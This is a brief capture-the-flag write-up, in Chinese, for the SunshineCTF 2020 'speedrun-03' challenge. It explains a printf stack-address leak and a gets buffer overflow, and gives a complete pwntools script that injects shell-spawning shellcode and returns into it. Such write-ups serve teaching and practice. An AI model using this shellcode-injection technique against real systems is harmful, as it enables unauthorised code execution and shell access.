###### tags: `sunshine` # speedrun-03 -  - printf會leak出local_78的位置 - gets會吃到local_78記憶體位置的東西 ```python= from pwn import * binary = context.binary = ELF('./chall_03') if not args.REMOTE: p = process(binary.path) else: p = remote('chal.2020.sunshinectf.org', 30003) p.sendlineafter('Just in time.\n','foobar') p.recvuntil('I\'ll make it: ') _ = p.recvline().strip() stack = int(_,16) log.info('stack: ' + hex(stack)) payload = b'' payload += asm(shellcraft.sh()) payload += (0x78 - len(payload)) * b'\x90' payload += p64(stack) p.sendline(payload) p.interactive() ``` - 先將shellcode寫入，再輸入扣去shellcode以外的字元補滿120然後return回local_78執行到shellcode